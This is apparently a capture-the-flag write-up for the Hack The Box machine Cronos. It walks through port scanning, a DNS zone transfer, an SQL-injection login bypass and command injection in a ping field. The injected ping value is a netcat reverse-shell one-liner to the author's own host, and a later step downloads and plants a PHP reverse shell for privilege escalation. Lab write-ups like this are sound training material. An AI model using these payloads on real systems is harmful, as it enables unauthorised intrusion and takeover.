Cronos Write up

Welcome to my Cronos Write-up

Recon

Nmap

$ sudo nmap -sSVC -A -oA nmap/Cronos 10.10.10.13

Nmap scan report for 10.10.10.13
Host is up (0.077s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18b973826f26c7788f1b3988d802cee8 (RSA)
|   256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_  256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)    ...

$ sudo nmap -p- -Pn -A -T4 10.10.10.13

Nmap scan report for 10.10.10.13
Host is up (0.084s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18b973826f26c7788f1b3988d802cee8 (RSA)
|   256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_  256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
...

$ sudo nmap -sU -A -Pn 10.10.10.13

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 09:29 +01
Nmap scan report for 10.10.10.13
Host is up (0.088s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT   STATE SERVICE VERSION
53/udp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

DNS (PORT 53)

We can see that port 53 is open on this machine. Let’s do some enumeration.

Make sure to add cronos.htb to /etc/hosts.

$ dig any cronos.htb @10.10.10.13

; <<>> DiG 9.18.12-1-Debian <<>> any cronos.htb @10.10.10.13
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33426
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb.                    IN      ANY

;; ANSWER SECTION:
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 84 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Mon May 01 09:47:22 +01 2023
;; MSG SIZE  rcvd: 131

$ dnsrecon -d cronos.htb -a -n 10.10.10.13

[*] std: Performing General Enumeration against: cronos.htb...
[*] Checking for Zone Transfer for cronos.htb name servers
[*] Resolving SOA Record
[+]      SOA cronos.htb 10.10.10.13
[*] Resolving NS Records
[*] NS Servers found:
[+]      NS ns1.cronos.htb 10.10.10.13
[*] Removing any duplicate NS server IP Addresses...
[*]  
[*] Trying NS server 10.10.10.13
[+] 10.10.10.13 Has port 53 TCP Open
[+] Zone Transfer was successful!!
[*]      NS ns1.cronos.htb 10.10.10.13
[*]      A @.cronos.htb 10.10.10.13
[*]      A admin.cronos.htb 10.10.10.13
[*]      A ns1.cronos.htb 10.10.10.13
[*]      A www.cronos.htb 10.10.10.13
[*] Checking for Zone Transfer for cronos.htb name servers
[*] Resolving SOA Record
[+]      SOA cronos.htb 10.10.10.13
[*] Resolving NS Records
[*] NS Servers found:
[+]      NS ns1.cronos.htb 10.10.10.13
[*] Removing any duplicate NS server IP Addresses...
[*]  
[*] Trying NS server 10.10.10.13
[+] 10.10.10.13 Has port 53 TCP Open
[+] Zone Transfer was successful!!
[*]      NS ns1.cronos.htb 10.10.10.13
[*]      A @.cronos.htb 10.10.10.13
[*]      A admin.cronos.htb 10.10.10.13
[*]      A ns1.cronos.htb 10.10.10.13
[*]      A www.cronos.htb 10.10.10.13
[-] Could not resolve domain: cronos.htb

Make sure to add cronos.htb, admin.cronos.htb, www.cronos.htb and ns1.cronos.htb to /etc/hosts.

HTTP (PORT 80)

http://cronos.htbs

http://admin.cronos.htb

Initial Foothold

http://admin.cronos.htb

We tried default creds such as admin admin But nothing worked.

Let’s try some sql injection : link

admin’#

It worked

I found a ping option, let’s use it and see if I can ping back my local machine.

The ping is working.

Seems like an attack vector. Let’s capture the request using burpsuite.

Method 1 (Using burpsuite):

Change the command:

Hit FORWARD.

Method 2:

Output:

Grab a shell from here.

8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.23 1234 >/tmp/f

Hit execute!

Privilege Escalation

www-data@cronos:/var/www/admin$ cat /etc/crontab

As u can see the system keeps executing the file artisan as root. This file seems to be php type. So let’s upload a php reverse shell & change the name to artisan then execute it as root using sudo.

$ locate shell.php

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php

Don’t forget to edit that reverse shell & change the attacker’s ip and the port.

$ python3 -m http.server 8000

www-data@cronos:/var/www/admin$ wget http://10.10.14.23:8000/shell.php

www-data@cronos:/var/www/admin$ cp shell.php /var/www/laravel/

www-data@cronos:/var/www/admin$ cd /var/www/laravel

www-data@cronos:/var/www/laravel$ mv shell.php artisan

www-data@cronos:/var/www/laravel$ sudo php artisan

We are prompted with a password request I just kept messing around & typing random passwords.